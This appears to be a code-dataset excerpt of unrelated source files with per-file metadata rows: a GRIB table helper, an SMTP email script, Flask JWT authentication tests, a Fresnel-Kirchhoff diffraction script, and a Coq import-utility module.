return val in self._abbr
def abbr(self, val: int) -> str:
"""
Get an abbreviated description
"""
res = self._abbr.get(val)
if res is None:
return str(val)
else:
return res
def desc(self, val: int) -> str:
"""
Get a long description
"""
res = self._desc.get(val)
if res is None:
return str(val)
else:
return res
@classmethod
def load(cls, edition: int, table: str) -> "GribTable":
key = (edition, table)
res = cls.cache.get(key)
if res is None:
res = cls(edition, table)
cls.cache[key] = res
return res
@classmethod
def get_grib2_table_prefix(cls, centre, table_version, local_table_version):
default_table_version = 4
if table_version is None or table_version == 255:
table_version = default_table_version
if local_table_version is not None and local_table_version not in (0, 255):
centres = cls.load(1, "0")
if centres.has(centre):
return os.path.join('tables', 'local', centres.abbr(centre), str(local_table_version))
return os.path.join('tables', str(table_version))
| gpl-2.0 | -5,546,674,192,884,967,000 | 29.008333 | 102 | 0.546515 | false | 3.743243 | false | false | false |
rboman/progs | apps/mails/mimetest.py | 1 | 1080 | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2017 Romain Boman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import smtplib
from email.MIMEText import MIMEText
file = open("CYGWIN-diffs.html",'r')
text = file.read()
file.close()
toA = "[email protected]"
fromA = "[email protected]"
mail = MIMEText(text)
mail['From'] = fromA
mail['Subject'] = "Sujet du message"
mail['To'] = toA
mail['Content-Type'] = "text/html"
smtp = smtplib.SMTP("smtp.ulg.ac.be")
smtp.set_debuglevel(1)
smtp.sendmail(fromA, [toA], mail.as_string())
smtp.close()
| apache-2.0 | -2,451,455,311,142,843,400 | 28.216216 | 76 | 0.703704 | false | 3.148688 | false | false | false |
atlassian/asap-authentication-python | atlassian_jwt_auth/frameworks/flask/tests/test_flask.py | 1 | 5032 | import unittest
from flask import Flask
from atlassian_jwt_auth.contrib.flask_app import requires_asap
from atlassian_jwt_auth.contrib.tests.utils import get_static_retriever_class
from atlassian_jwt_auth.frameworks.flask import with_asap
from atlassian_jwt_auth.tests import utils
from atlassian_jwt_auth.tests.utils import (
create_token,
)
def get_app():
app = Flask(__name__)
app.config.update({
'ASAP_VALID_AUDIENCE': 'server-app',
'ASAP_VALID_ISSUERS': ('client-app',),
'ASAP_PUBLICKEY_REPOSITORY': None
})
@app.route("/")
@requires_asap
def view():
return "OK"
@app.route("/restricted-to-another-client/")
@with_asap(issuers=['another-client'])
def view_for_another_client_app():
return "OK"
return app
class FlaskTests(utils.RS256KeyTestMixin, unittest.TestCase):
""" tests for the atlassian_jwt_auth.contrib.tests.flask """
def setUp(self):
self._private_key_pem = self.get_new_private_key_in_pem_format()
self._public_key_pem = utils.get_public_key_pem_for_private_key_pem(
self._private_key_pem
)
self.app = get_app()
self.client = self.app.test_client()
retriever = get_static_retriever_class({
'client-app/key01': self._public_key_pem
})
self.app.config['ASAP_KEY_RETRIEVER_CLASS'] = retriever
def send_request(self, token, url='/'):
""" returns the response of sending a request containing the given
token sent in the Authorization header.
"""
return self.client.get(url, headers={
'Authorization': b'Bearer ' + token
})
def test_request_with_valid_token_is_allowed(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
def test_request_with_duplicate_jti_is_rejected_as_per_setting(self):
self.app.config['ASAP_CHECK_JTI_UNIQUENESS'] = True
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
self.assertEqual(self.send_request(token).status_code, 401)
def _assert_request_with_duplicate_jti_is_accepted(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 200)
self.assertEqual(self.send_request(token).status_code, 200)
def test_request_with_duplicate_jti_is_accepted(self):
self._assert_request_with_duplicate_jti_is_accepted()
def test_request_with_duplicate_jti_is_accepted_as_per_setting(self):
self.app.config['ASAP_CHECK_JTI_UNIQUENESS'] = False
self._assert_request_with_duplicate_jti_is_accepted()
def test_request_with_invalid_audience_is_rejected(self):
token = create_token(
'client-app', 'invalid-audience',
'client-app/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 401)
def test_request_with_invalid_token_is_rejected(self):
response = self.send_request(b'notavalidtoken')
self.assertEqual(response.status_code, 401)
def test_request_with_invalid_issuer_is_rejected(self):
# Try with a different audience with a valid signature
self.app.config['ASAP_KEY_RETRIEVER_CLASS'] = (
get_static_retriever_class({
'another-client/key01': self._public_key_pem
})
)
token = create_token(
'another-client', 'server-app',
'another-client/key01', self._private_key_pem
)
self.assertEqual(self.send_request(token).status_code, 403)
def test_decorated_request_with_invalid_issuer_is_rejected(self):
# Try with a different audience with a valid signature
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem
)
url = '/restricted-to-another-client/'
self.assertEqual(self.send_request(token, url=url).status_code, 403)
def test_request_subject_and_issue_not_matching(self):
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem,
subject='different'
)
self.assertEqual(self.send_request(token).status_code, 401)
def test_request_subject_does_not_need_to_match_issuer_from_settings(self):
self.app.config['ASAP_SUBJECT_SHOULD_MATCH_ISSUER'] = False
token = create_token(
'client-app', 'server-app',
'client-app/key01', self._private_key_pem,
subject='different'
)
self.assertEqual(self.send_request(token).status_code, 200)
| mit | -3,690,334,047,130,404,000 | 35.201439 | 79 | 0.627385 | false | 3.511514 | true | false | false |
srio/Diffraction | fresnel_kirchhoff_1D.py | 1 | 2886 | """
fresnel:
functions:
goFromTo: calculates the phase shift matrix
"""
__author__ = "Manuel Sanchez del Rio"
__contact__ = "[email protected]"
__copyright = "ESRF, 2012"
import numpy, math
def goFromTo(source,image,distance=1.0,lensF=None,wavelength=1e-10):
distance = numpy.array(distance)
x1 = numpy.outer(source,numpy.ones(image.size))
x2 = numpy.outer(numpy.ones(source.size),image)
r = numpy.sqrt( numpy.power(x1-x2,2) + numpy.power(distance,2) )
# add lens at the image plane
if lensF != None:
r = r - numpy.power(x1-x2,2)/lensF
wavenumber = numpy.pi*2/wavelength
return numpy.exp(1.j * wavenumber * r)
if __name__ == '__main__':
# wavelength = 1e-10
# aperture_diameter = 10e-6
# detector_size = 0.8e-3
# #wavelength = 500e-9
# #aperture_diameter = 1e-3
# #detector_size = 4e-3
#
# sourcepoints = 1000
# detpoints = 1000
# distance = 1.00
# lensF = None
# wavelength = 5000e-10
# sourcesize = 500e-6
# detector_size = 0.008
#wavelength = 500e-9
#aperture_diameter = 1e-3
#detector_size = 4e-3
wavelength = 1.24e-10 # 10keV
aperture_diameter = 40e-6 # 1e-3 # 1e-6
detector_size = 800e-6
distance = 3.6
sourcepoints = 1000
detpoints = 1000
lensF = None
sourcesize = aperture_diameter
position1x = numpy.linspace(-sourcesize/2,sourcesize/2,sourcepoints)
position2x = numpy.linspace(-detector_size/2,detector_size/2,detpoints)
fields12 = goFromTo(position1x,position2x,distance, \
lensF=lensF,wavelength=wavelength)
print ("Shape of fields12: ",fields12.shape)
#prepare results
fieldComplexAmplitude = numpy.dot(numpy.ones(sourcepoints),fields12)
print ("Shape of Complex U: ",fieldComplexAmplitude.shape)
print ("Shape of position1x: ",position1x.shape)
fieldIntensity = numpy.power(numpy.abs(fieldComplexAmplitude),2)
fieldPhase = numpy.arctan2(numpy.real(fieldComplexAmplitude), \
numpy.imag(fieldComplexAmplitude))
#
# write spec formatted file
#
out_file = "fresnel_kirchhoff_1D.spec"
f = open(out_file, 'w')
header="#F %s \n\n#S 1 fresnel-kirchhoff diffraction integral\n#N 3 \n#L X[m] intensity phase\n"%out_file
f.write(header)
for i in range(detpoints):
out = numpy.array((position2x[i], fieldIntensity[i], fieldPhase[i]))
f.write( ("%20.11e "*out.size+"\n") % tuple( out.tolist()) )
f.close()
print ("File written to disk: %s"%out_file)
#
#plots
#
from matplotlib import pylab as plt
plt.figure(1)
plt.plot(position2x*1e6,fieldIntensity)
plt.title("Fresnel-Kirchhoff Diffraction")
plt.xlabel("X [um]")
plt.ylabel("Intensity [a.u.]")
plt.show() | gpl-2.0 | -2,424,140,715,528,884,700 | 27.029126 | 112 | 0.618157 | false | 2.978328 | false | false | false |
JasonGross/coq-tools | import_util.py | 1 | 28530 | from __future__ import with_statement, print_function
import os, subprocess, re, sys, glob, os.path, tempfile, time
from functools import cmp_to_key
from memoize import memoize
from coq_version import get_coqc_help, get_coq_accepts_o, group_coq_args_split_recognized, coq_makefile_supports_arg
from custom_arguments import DEFAULT_VERBOSITY, DEFAULT_LOG
from util import cmp_compat as cmp
import util
__all__ = ["filename_of_lib", "lib_of_filename", "get_file_as_bytes", "get_file", "make_globs", "get_imports", "norm_libname", "recursively_get_imports", "IMPORT_ABSOLUTIZE_TUPLE", "ALL_ABSOLUTIZE_TUPLE", "absolutize_has_all_constants", "run_recursively_get_imports", "clear_libimport_cache", "get_byte_references_for", "sort_files_by_dependency", "get_recursive_requires", "get_recursive_require_names"]
file_mtimes = {}
file_contents = {}
lib_imports_fast = {}
lib_imports_slow = {}
DEFAULT_LIBNAMES=(('.', 'Top'), )
IMPORT_ABSOLUTIZE_TUPLE = ('lib', )# 'mod')
ALL_ABSOLUTIZE_TUPLE = ('lib', 'proj', 'rec', 'ind', 'constr', 'def', 'syndef', 'class', 'thm', 'lem', 'prf', 'ax', 'inst', 'prfax', 'coind', 'scheme', 'vardef')# , 'mod', 'modtype')
IMPORT_REG = re.compile('^R([0-9]+):([0-9]+) ([^ ]+) <> <> lib$', re.MULTILINE)
IMPORT_LINE_REG = re.compile(r'^\s*(?:Require\s+Import|Require\s+Export|Require|Load\s+Verbose|Load)\s+(.*?)\.(?:\s|$)', re.MULTILINE | re.DOTALL)
def warning(*objs):
print("WARNING: ", *objs, file=sys.stderr)
def error(*objs):
print("ERROR: ", *objs, file=sys.stderr)
def fill_kwargs(kwargs):
rtn = {
'libnames' : DEFAULT_LIBNAMES,
'non_recursive_libnames': tuple(),
'ocaml_dirnames' : tuple(),
'verbose' : DEFAULT_VERBOSITY,
'log' : DEFAULT_LOG,
'coqc' : 'coqc',
'coq_makefile' : 'coq_makefile',
'walk_tree' : True,
'coqc_args' : tuple(),
'inline_coqlib' : None,
}
rtn.update(kwargs)
return rtn
def safe_kwargs(kwargs):
for k, v in list(kwargs.items()):
if isinstance(v, list):
kwargs[k] = tuple(v)
return dict((k, v) for k, v in kwargs.items() if not isinstance(v, dict))
def fix_path(filename):
return filename.replace('\\', '/')
def absolutize_has_all_constants(absolutize_tuple):
'''Returns True if absolutizing the types of things mentioned by the tuple is enough to ensure that we only use absolute names'''
return set(ALL_ABSOLUTIZE_TUPLE).issubset(set(absolutize_tuple))
def libname_with_dot(logical_name):
if logical_name in ("", '""', "''"):
return ""
else:
return logical_name + "."
def clear_libimport_cache(libname):
if libname in lib_imports_fast.keys():
del lib_imports_fast[libname]
if libname in lib_imports_slow.keys():
del lib_imports_slow[libname]
@memoize
def os_walk(top, topdown=True, onerror=None, followlinks=False):
return tuple(os.walk(top, topdown=topdown, onerror=onerror, followlinks=followlinks))
@memoize
def os_path_isfile(filename):
return os.path.isfile(filename)
def filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
for physical_name, logical_name in list(libnames) + list(non_recursive_libnames):
if lib.startswith(libname_with_dot(logical_name)):
cur_lib = lib[len(libname_with_dot(logical_name)):]
cur_lib = os.path.join(physical_name, cur_lib.replace('.', os.sep))
yield fix_path(os.path.relpath(os.path.normpath(cur_lib + ext), '.'))
def local_filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
# is this the right thing to do?
lib = lib.replace('.', os.sep)
for dirpath, dirname, filenames in os_walk('.', followlinks=True):
filename = os.path.relpath(os.path.normpath(os.path.join(dirpath, lib + ext)), '.')
if os_path_isfile(filename):
yield fix_path(filename)
@memoize
def filename_of_lib_helper(lib, libnames, non_recursive_libnames, ext):
filenames = list(filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext))
local_filenames = list(local_filenames_of_lib_helper(lib, libnames, non_recursive_libnames, ext))
existing_filenames = [f for f in filenames if os_path_isfile(f) or os_path_isfile(os.path.splitext(f)[0] + '.v')]
if len(existing_filenames) > 0:
retval = existing_filenames[0]
if len(existing_filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(existing_filenames), retval))
return retval
if len(filenames) != 0:
DEFAULT_LOG('WARNING: One or more physical paths match logical path %s, but none of them exist: %s'
% (lib, ', '.join(filenames)))
if len(local_filenames) > 0:
retval = local_filenames[0]
if len(local_filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple local physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(local_filenames), retval))
return retval
if len(filenames) > 0:
retval = filenames[0]
if len(filenames) == 1:
return retval
else:
DEFAULT_LOG('WARNING: Multiple non-existent physical paths match logical path %s: %s. Selecting %s.'
% (lib, ', '.join(filenames), retval))
return retval
return fix_path(os.path.relpath(os.path.normpath(lib.replace('.', os.sep) + ext), '.'))
def filename_of_lib(lib, ext='.v', **kwargs):
kwargs = fill_kwargs(kwargs)
return filename_of_lib_helper(lib, libnames=tuple(kwargs['libnames']), non_recursive_libnames=tuple(kwargs['non_recursive_libnames']), ext=ext)
@memoize
def lib_of_filename_helper(filename, libnames, non_recursive_libnames, exts):
filename = os.path.relpath(os.path.normpath(filename), '.')
for ext in exts:
if filename.endswith(ext):
filename = filename[:-len(ext)]
break
for physical_name, logical_name in ((os.path.relpath(os.path.normpath(phys), '.'), libname_with_dot(logical)) for phys, logical in list(libnames) + list(non_recursive_libnames)):
filename_rel = os.path.relpath(filename, physical_name)
if not filename_rel.startswith('..' + os.sep) and not os.path.isabs(filename_rel):
return (filename, logical_name + filename_rel.replace(os.sep, '.'))
if filename.startswith('..' + os.sep) and not os.path.isabs(filename):
filename = os.path.abspath(filename)
return (filename, filename.replace(os.sep, '.'))
def lib_of_filename(filename, exts=('.v', '.glob'), **kwargs):
kwargs = fill_kwargs(kwargs)
filename, libname = lib_of_filename_helper(filename, libnames=tuple(kwargs['libnames']), non_recursive_libnames=tuple(kwargs['non_recursive_libnames']), exts=exts)
# if '.' in filename and kwargs['verbose']:
# # TODO: Do we still need this warning?
# kwargs['log']("WARNING: There is a dot (.) in filename %s; the library conversion probably won't work." % filename)
return libname
def is_local_import(libname, **kwargs):
'''Returns True if libname is an import to a local file that we can discover and include, and False otherwise'''
return os.path.isfile(filename_of_lib(libname, **kwargs))
def get_raw_file_as_bytes(filename, **kwargs):
kwargs = fill_kwargs(kwargs)
if kwargs['verbose']:
filename_extra = '' if os.path.isabs(filename) else ' (%s)' % os.path.abspath(filename)
kwargs['log']('getting %s%s' % (filename, filename_extra))
with open(filename, 'rb') as f:
return f.read()
def get_raw_file(*args, **kwargs):
return util.normalize_newlines(get_raw_file_as_bytes(*args, **kwargs).decode('utf-8'))
# code is string
@memoize
def get_constr_name(code):
first_word = code.split(' ')[0]
last_component = first_word.split('.')[-1]
return last_component
# before, after are both strings
def move_strings_once(before, after, possibility, relaxed=False):
for i in possibility:
if before[-len(i):] == i:
return before[:-len(i)], before[-len(i):] + after
if relaxed: # allow no matches
return before, after
else:
return None, None
# before, after are both strings
def move_strings_pre(before, after, possibility):
while len(before) > 0:
new_before, new_after = move_strings_once(before, after, possibility)
if new_before is None or new_after is None:
return before, after
before, after = new_before, new_after
return (before, after)
# before, after are both strings
def move_function(before, after, get_len):
while len(before) > 0:
n = get_len(before)
if n is None or n <= 0:
return before, after
before, after = before[:-n], before[n:] + after
return before, after
# before, after are both strings
def move_strings(before, after, *possibilities):
for possibility in possibilities:
before, after = move_strings_pre(before, after, possibility)
return before, after
# before, after are both strings
def move_space(before, after):
return move_strings(before, after, '\n\t\r ')
# uses byte locations
def remove_from_require_before(contents, location):
"""removes "From ... " from things like "From ... Require ..." """
assert(contents is bytes(contents))
before, after = contents[:location].decode('utf-8'), contents[location:].decode('utf-8')
before, after = move_space(before, after)
before, after = move_strings_once(before, after, ('Import', 'Export'), relaxed=True)
before, after = move_space(before, after)
before, after = move_strings_once(before, after, ('Require',), relaxed=False)
if before is None or after is None: return contents
before, _ = move_space(before, after)
before, _ = move_function(before, after, (lambda b: 1 if b[-1] not in ' \t\r\n' else None))
if before is None: return contents
before, _ = move_space(before, after)
before, _ = move_strings_once(before, after, ('From',), relaxed=False)
if before is None: return contents
return (before + after).encode('utf-8')
# returns locations as bytes
def get_references_from_globs(globs):
all_globs = set((int(start), int(end) + 1, loc, append, ty.strip())
for start, end, loc, append, ty
in re.findall('^R([0-9]+):([0-9]+) ([^ ]+) <> ([^ ]+) ([^ ]+)$', globs, flags=re.MULTILINE))
return tuple(sorted(all_globs, key=(lambda x: x[0]), reverse=True))
# contents should be bytes; globs should be string
def update_with_glob(contents, globs, absolutize, libname, transform_base=(lambda x: x), **kwargs):
assert(contents is bytes(contents))
kwargs = fill_kwargs(kwargs)
for start, end, loc, append, ty in get_references_from_globs(globs):
cur_code = contents[start:end].decode('utf-8')
if ty not in absolutize or loc == libname:
if kwargs['verbose'] >= 2: kwargs['log']('Skipping %s at %d:%d (%s), location %s %s' % (ty, start, end, cur_code, loc, append))
# sanity check for correct replacement, to skip things like record builder notation
elif append != '<>' and get_constr_name(cur_code) != append:
if kwargs['verbose'] >= 2: kwargs['log']('Skipping invalid %s at %d:%d (%s), location %s %s' % (ty, start, end, cur_code, loc, append))
else: # ty in absolutize and loc != libname
rep = transform_base(loc) + ('.' + append if append != '<>' else '')
if kwargs['verbose'] == 2: kwargs['log']('Qualifying %s %s to %s' % (ty, cur_code, rep))
if kwargs['verbose'] > 2: kwargs['log']('Qualifying %s %s to %s from R%s:%s %s <> %s %s' % (ty, cur_code, rep, start, end, loc, append, ty))
contents = contents[:start] + rep.encode('utf-8') + contents[end:]
contents = remove_from_require_before(contents, start)
return contents
def get_all_v_files(directory, exclude=tuple()):
all_files = []
exclude = [os.path.normpath(i) for i in exclude]
for dirpath, dirnames, filenames in os.walk(directory):
all_files += [os.path.relpath(name, '.') for name in glob.glob(os.path.join(dirpath, '*.v'))
if os.path.normpath(name) not in exclude]
return tuple(map(fix_path, all_files))
# we want to run on passing arguments if we're running in
# passing/non-passing mode, cf
# https://github.com/JasonGross/coq-tools/issues/57. Hence we return
# the passing version iff passing_coqc is passed
def get_maybe_passing_arg(kwargs, key):
if kwargs.get('passing_coqc'): return kwargs['passing_' + key]
return kwargs[key]
def run_coq_makefile_and_make(v_files, targets, **kwargs):
kwargs = safe_kwargs(fill_kwargs(kwargs))
f = tempfile.NamedTemporaryFile(suffix='.coq', prefix='Makefile', dir='.', delete=False)
mkfile = os.path.basename(f.name)
f.close()
cmds = [kwargs['coq_makefile'], 'COQC', '=', get_maybe_passing_arg(kwargs, 'coqc'), '-o', mkfile]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'libnames'):
cmds += ['-R', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'non_recursive_libnames'):
cmds += ['-Q', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for dirname in get_maybe_passing_arg(kwargs, 'ocaml_dirnames'):
cmds += ['-I', dirname]
coq_makefile_help = get_coqc_help(kwargs['coq_makefile'], **kwargs)
grouped_args, unrecognized_args = group_coq_args_split_recognized(get_maybe_passing_arg(kwargs, 'coqc_args'), coq_makefile_help, is_coq_makefile=True)
for args in grouped_args:
cmds.extend(args)
if unrecognized_args:
if coq_makefile_supports_arg(coq_makefile_help):
for arg in unrecognized_args:
cmds += ['-arg', arg]
else:
if kwargs['verbose']: kwargs['log']('WARNING: Unrecognized arguments to coq_makefile: %s' % repr(unrecognized_args))
cmds += list(map(fix_path, v_files))
if kwargs['verbose']:
kwargs['log'](' '.join(cmds))
try:
p_make_makefile = subprocess.Popen(cmds,
stdout=subprocess.PIPE)
(stdout, stderr) = p_make_makefile.communicate()
except OSError as e:
error("When attempting to run coq_makefile:")
error(repr(e))
error("Failed to run coq_makefile using command line:")
error(' '.join(cmds))
error("Perhaps you forgot to add COQBIN to your PATH?")
error("Try running coqc on your files to get .glob files, to work around this.")
sys.exit(1)
if kwargs['verbose']:
kwargs['log'](' '.join(['make', '-k', '-f', mkfile] + targets))
try:
p_make = subprocess.Popen(['make', '-k', '-f', mkfile] + targets, stdin=subprocess.PIPE, stdout=sys.stderr) #, stdout=subprocess.PIPE)
return p_make.communicate()
finally:
for filename in (mkfile, mkfile + '.conf', mkfile + '.d', '.%s.d' % mkfile, '.coqdeps.d'):
if os.path.exists(filename):
os.remove(filename)
def make_one_glob_file(v_file, **kwargs):
kwargs = safe_kwargs(fill_kwargs(kwargs))
coqc_prog = get_maybe_passing_arg(kwargs, 'coqc')
cmds = [coqc_prog, '-q']
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'libnames'):
cmds += ['-R', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for physical_name, logical_name in get_maybe_passing_arg(kwargs, 'non_recursive_libnames'):
cmds += ['-Q', physical_name, (logical_name if logical_name not in ("", "''", '""') else '""')]
for dirname in get_maybe_passing_arg(kwargs, 'ocaml_dirnames'):
cmds += ['-I', dirname]
cmds += list(get_maybe_passing_arg(kwargs, 'coqc_args'))
v_file_root, ext = os.path.splitext(fix_path(v_file))
o_file = os.path.join(tempfile.gettempdir(), os.path.basename(v_file_root) + '.vo')
if get_coq_accepts_o(coqc_prog, **kwargs):
cmds += ['-o', o_file]
else:
kwargs['log']("WARNING: Clobbering '%s' because coqc does not support -o" % o_file)
cmds += ['-dump-glob', v_file_root + '.glob', v_file_root + ext]
if kwargs['verbose']:
kwargs['log'](' '.join(cmds))
try:
p = subprocess.Popen(cmds, stdout=subprocess.PIPE)
return p.communicate()
finally:
if os.path.exists(o_file): os.remove(o_file)
def make_globs(logical_names, **kwargs):
kwargs = fill_kwargs(kwargs)
existing_logical_names = [i for i in logical_names
if os.path.isfile(filename_of_lib(i, ext='.v', **kwargs))]
if len(existing_logical_names) == 0: return
filenames_vo_v_glob = [(filename_of_lib(i, ext='.vo', **kwargs), filename_of_lib(i, ext='.v', **kwargs), filename_of_lib(i, ext='.glob', **kwargs)) for i in existing_logical_names]
filenames_vo_v_glob = [(vo_name, v_name, glob_name) for vo_name, v_name, glob_name in filenames_vo_v_glob
if not (os.path.isfile(glob_name) and os.path.getmtime(glob_name) > os.path.getmtime(v_name))]
for vo_name, v_name, glob_name in filenames_vo_v_glob:
if os.path.isfile(glob_name) and not os.path.getmtime(glob_name) > os.path.getmtime(v_name):
os.remove(glob_name)
# if the .vo file already exists and is new enough, we assume
# that all dependent .vo files also exist, and just run coqc
# in a way that doesn't update the .vo file. We use >= rather
# than > because we're using .vo being new enough as a proxy
# for the dependent .vo files existing, so we don't care as
# much about being perfectly accurate on .vo file timing
# (unlike .glob file timing, were we need it to be up to
# date), and it's better to not clobber the .vo file when
# we're unsure if it's new enough.
if os.path.exists(vo_name) and os.path.getmtime(vo_name) >= os.path.getmtime(v_name):
make_one_glob_file(v_name, **kwargs)
filenames_vo_v_glob = [(vo_name, v_name, glob_name) for vo_name, v_name, glob_name in filenames_vo_v_glob
if not (os.path.exists(vo_name) and os.path.getmtime(vo_name) >= os.path.getmtime(v_name))]
filenames_v = [v_name for vo_name, v_name, glob_name in filenames_vo_v_glob]
filenames_glob = [glob_name for vo_name, v_name, glob_name in filenames_vo_v_glob]
if len(filenames_vo_v_glob) == 0: return
extra_filenames_v = (get_all_v_files('.', filenames_v) if kwargs['walk_tree'] else [])
(stdout_make, stderr_make) = run_coq_makefile_and_make(tuple(sorted(list(filenames_v) + list(extra_filenames_v))), filenames_glob, **kwargs)
def get_glob_file_for(filename, update_globs=False, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = fix_path(filename)
if filename[-2:] != '.v': filename += '.v'
libname = lib_of_filename(filename, **kwargs)
globname = filename[:-2] + '.glob'
if filename not in file_contents.keys() or file_mtimes[filename] < os.stat(filename).st_mtime:
file_contents[filename] = get_raw_file_as_bytes(filename, **kwargs)
file_mtimes[filename] = os.stat(filename).st_mtime
if update_globs:
if file_mtimes[filename] > time.time():
kwargs['log']("WARNING: The file %s comes from the future! (%d > %d)" % (filename, file_mtimes[filename], time.time()))
if time.time() - file_mtimes[filename] < 2:
if kwargs['verbose']:
kwargs['log']("NOTE: The file %s is very new (%d, %d seconds old), delaying until it's a bit older" % (filename, file_mtimes[filename], time.time() - file_mtimes[filename]))
# delay until the .v file is old enough that a .glob file will be considered newer
# if we just wait until they're not equal, we apparently get issues like https://gitlab.com/Zimmi48/coq/-/jobs/535005442
while time.time() - file_mtimes[filename] < 2:
time.sleep(0.1)
make_globs([libname], **kwargs)
if os.path.isfile(globname):
if os.stat(globname).st_mtime > file_mtimes[filename]:
return get_raw_file(globname, **kwargs)
elif kwargs['verbose']:
kwargs['log']("WARNING: Assuming that %s is not a valid reflection of %s because %s is newer (%d >= %d)" % (globname, filename, filename, file_mtimes[filename], os.stat(globname).st_mtime))
return None
def get_byte_references_for(filename, types, **kwargs):
globs = get_glob_file_for(filename, **kwargs)
if globs is None: return None
references = get_references_from_globs(globs)
return tuple((start, end, loc, append, ty) for start, end, loc, append, ty in references
if types is None or ty in types)
def get_file_as_bytes(filename, absolutize=('lib',), update_globs=False, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = fix_path(filename)
if filename[-2:] != '.v': filename += '.v'
libname = lib_of_filename(filename, **kwargs)
globname = filename[:-2] + '.glob'
if filename not in file_contents.keys() or file_mtimes[filename] < os.stat(filename).st_mtime:
file_contents[filename] = get_raw_file_as_bytes(filename, **kwargs)
file_mtimes[filename] = os.stat(filename).st_mtime
if len(absolutize) > 0:
globs = get_glob_file_for(filename, update_globs=update_globs, **kwargs)
if globs is not None:
file_contents[filename] = update_with_glob(file_contents[filename], globs, absolutize, libname, **kwargs)
return file_contents[filename]
# returns string, newlines normalized
def get_file(*args, **kwargs):
return util.normalize_newlines(get_file_as_bytes(*args, **kwargs).decode('utf-8'))
def get_require_dict(lib, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if lib not in lib_imports_slow.keys():
make_globs([lib], **kwargs)
if os.path.isfile(glob_name): # making succeeded
contents = get_raw_file(glob_name, **kwargs)
lines = contents.split('\n')
lib_imports_slow[lib] = {}
for start, end, name in IMPORT_REG.findall(contents):
name = norm_libname(name, **kwargs)
if name not in lib_imports_slow[lib].keys():
lib_imports_slow[lib][name] = []
lib_imports_slow[lib][name].append((int(start), int(end)))
for name in lib_imports_slow[lib].keys():
lib_imports_slow[lib][name] = tuple(lib_imports_slow[lib][name])
if lib in lib_imports_slow.keys():
return lib_imports_slow[lib]
return {}
def get_require_names(lib, **kwargs):
return tuple(sorted(get_require_dict(lib, **kwargs).keys()))
def get_require_locations(lib, **kwargs):
return sorted(set(loc for name, locs in get_require_dict(lib, **kwargs).items()
for loc in locs))
def transitively_close(d, make_new_value=(lambda x: tuple()), reflexive=True):
updated = True
while updated:
updated = False
for key in tuple(d.keys()):
newv = set(d[key])
if reflexive: newv.add(key)
for v in tuple(newv):
if v not in d.keys(): d[v] = make_new_value(v)
newv.update(set(d[v]))
if newv != set(d[key]):
d[key] = newv
updated = True
return d
def get_recursive_requires(*libnames, **kwargs):
requires = dict((lib, get_require_names(lib, **kwargs)) for lib in libnames)
transitively_close(requires, make_new_value=(lambda lib: get_require_names(lib, **kwargs)), reflexive=True)
return requires
def get_recursive_require_names(libname, **kwargs):
return tuple(i for i in get_recursive_requires(libname, **kwargs).keys() if i != libname)
def sort_files_by_dependency(filenames, reverse=True, **kwargs):
kwargs = fill_kwargs(kwargs)
filenames = map(fix_path, filenames)
filenames = [(filename + '.v' if filename[-2:] != '.v' else filename) for filename in filenames]
libnames = [lib_of_filename(filename, **kwargs) for filename in filenames]
requires = get_recursive_requires(*libnames, **kwargs)
def fcmp(f1, f2):
if f1 == f2: return cmp(f1, f2)
l1, l2 = lib_of_filename(f1, **kwargs), lib_of_filename(f2, **kwargs)
if l1 == l2: return cmp(f1, f2)
# this only works correctly if the closure is *reflexive* as
# well as transitive, because we require that if A requires B,
# then A must have strictly more requires than B (i.e., it
# must include itself)
if len(requires[l1]) != len(requires[l2]): return cmp(len(requires[l1]), len(requires[l2]))
return cmp(l1, l2)
filenames = sorted(filenames, key=cmp_to_key(fcmp), reverse=reverse)
return filenames
def get_imports(lib, fast=False, **kwargs):
kwargs = fill_kwargs(kwargs)
lib = norm_libname(lib, **kwargs)
glob_name = filename_of_lib(lib, ext='.glob', **kwargs)
v_name = filename_of_lib(lib, ext='.v', **kwargs)
if not fast:
get_require_dict(lib, **kwargs)
if lib in lib_imports_slow.keys():
return tuple(k for k, v in sorted(lib_imports_slow[lib].items(), key=(lambda kv: kv[1])))
# making globs failed, or we want the fast way, fall back to regexp
if lib not in lib_imports_fast.keys():
contents = get_file(v_name, **kwargs)
imports_string = re.sub('\\s+', ' ', ' '.join(IMPORT_LINE_REG.findall(contents))).strip()
lib_imports_fast[lib] = tuple(sorted(set(norm_libname(i, **kwargs)
for i in imports_string.split(' ') if i != '')))
return lib_imports_fast[lib]
def norm_libname(lib, **kwargs):
kwargs = fill_kwargs(kwargs)
filename = filename_of_lib(lib, **kwargs)
